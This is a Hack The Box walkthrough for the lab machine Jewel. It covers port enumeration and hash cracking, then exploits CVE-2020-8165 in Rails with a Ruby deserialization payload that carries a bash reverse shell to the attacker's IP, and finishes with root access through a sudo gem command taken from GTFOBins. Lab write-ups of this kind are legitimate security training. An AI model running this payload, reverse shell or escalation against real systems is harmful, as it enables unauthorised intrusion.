Hack The Box - Jewel Walkthrough without Metasploit

Jewel

Enumeration

Let's run our NmapAutomator script for a first recon:

NmapAutomator.sh 10.10.10.211 All

Nmap Scan

Ports

We have three ports open: 22, 8000, 8080. First thing we do is add jewel.htb to our /etc/hosts and then we will take a look at the http ports.

22

This is the SSH (Secure Shell) port, we might be able to use it later to log in if we find any valid username and its password or its rsa key.

8000 & 8080

We have two http ports open, on port 8000 we have an Apache running and on 8080 we have nginx running

8000

According with our Nmap there's a gitweb on port 8000 so let's check that out first:

Gitweb

There's one project on Gitweb, BL0G!, lets inspect it a bit:

BD.SQL file

There are some files that might be useful like Gemfile or bd.sql, if we click on them:

Gemfile

Gemfile

We can see that the BL0G! is written using Ruby 2.5.5 with rails version 5.2.2.1

BD.SQL

Possible Users found

We found two possible users, bill and jennifer with their hashes, let's use hashcat in order to attempt to crack it. First let's identify the kind of Hash we are working with:

hashcat -h | grep '$2'

Identify Hash with Hashcat

hashcat -m 3200 -a 0 jewelhashes /usr/share/wordlists/rockyou.txt

Hashcat

After an awful lot of time (for a CTF) we stopped Hashcat since we couldn't crack any password. We also tried with john:

john jewelhashes --wordlist /usr/share/wordlists/rockyou.txt

John

We did not have much luck cracking those passwords with neither John nor Hashcat so let's focus on the next port.

8080

We start by running Gobuster on this port

gobuster dir -u http://jewel.htb:8080 -w /usr/share/wordlists/dirb/big.txt -t 40 -e -x html,php,db,txt

Gobuster Scan

Here is where the Blog of the previous gitweb is being hosted:

BL0G!

We can try to sign up and see if we can do something:

Sign up

We could Register on the blog:

Registration successfully

Now we log in with our new evil user:

Log in

We can edit our username, maybe we can leverage that:

User account

So far, we know we are on a Blog made with ruby (2.5.5) on rails (5.2.2.1) and we can create a user and modify its username, with some google searches we found this CVE - CVE-2020-8165

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165cve.mitre.org

CVE-2020-8165

Allow an attacker to unmarshal user-provided objects in MemCacheStore and RedisCacheStore potentially resulting in an RCE. In other words, if we can modify our username, we can potentially get RCE.

Looking a bit more about that CVE we found a nice github repository that exploits it:

GitHub - masahiro331/CVE-2020-8165GitHub

Masahiro331 exploit

Exploitation

We follow the instructions to install it:

git clone https://github.com/masahiro331/CVE-2020-8165.git
bundle install --path vendor/bundle
bundle exec rails db:migrate
bundle exec rails console

In case you ran into troubles like this:

Bundle install failing

We can fix it by editing the gemfile file from:

Original Gemfile

To:

Edited Gemfile

We might also have some problems with sqlite3:

sqlite3 problem

In that case we just need to install it:

apt-get install libsqlite3-dev

And once installed, run:

gem install sqlite3 -v '1.4.2' --source 'https://rubygems.org/'

Once we have that installed we should be able to run again:

bundle install --path vendor/bundle

On one console we run:

bundle exec rails s

And on another console:

bundle exec rails console

reverse = '`/bin/bash -c "bash -i >& /dev/tcp/10.10.14.18/4242 0>&1"`'
erb = ERB.allocate
erb.instance_variable_set :@src, reverse
erb.instance_variable_set :@filename, "1"
erb.instance_variable_set :@lineno, 1
payload = Marshal.dump(ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new erb, :result)
puts "Payload"
require 'uri'
puts URI.encode_www_form(payload: payload)

Payload Creation

Now our payload is ready to be used, we can intercept the user update post with burp and send the payload:

Intercept Post Request

Send it over to the Repeater and change the username with our payload and click send:

Sending our Payload

Now we disable burp intercept and try to go to http://jewel.htb:8080/articles , we should have a shell on our netcat:

User

Internal Enumeration

With our user flag grabbed now it's time to some internal enumeration, looking through the files we found something interesting at /var/backups:

sql file

If we cat that file, we will be able to see two new hashes, again from jennifer and bill, they are different, let's try to crack them:

Hashes

This time we could crack it really fast:

hashcat -m 3200 -a 0 jewelhashes /usr/share/wordlists/rockyou.txt

#We can see it with

hashcat -m 3200 -a 0 jewelhashes /usr/share/wordlists/rockyou.txt --show

Bills Password

Now if we try to sudo -l we get an error:

Authenticator Error

We need a Verification code, if we enum bills folder we will see a hint towards it:

Google Authenticator

For this part there is an extension for browsers but I rather prefer Google Authenticator from the marketplace for Android.

Google Authenticator - Apps on Google PlayGooglePlay

Google Authenticator App

if we cat that file

Google Auth info

We configure our App and try sudo -l again:

Failed attempt

And it failed, although I had it configured right... but, Google Authenticator works with the date, if we look at the machines date its off from our current date for more than one hour (this might not be your case) but if you're in a different time-zone than the box, you need to change your phones date in order to get the correct code, we do so and try again. We can also use Authenticator plugin for firefox:

Authenticator plugin

We change our timedatectl if it's not the same as the box (remember to change it back later):

timedatectl

And also set the date to be same time as the box (which is a bit off):

setting date

If we run sudo -l now:

Sudo -l as bill

We can run /usr/bin/gem, if we go to GTFOBins:

gem | GTFOBinsgtfobins.github.io

GTFOBins

sudo /usr/bin/gem open -e "/bin/sh -c /bin/sh" rdoc

Pwnd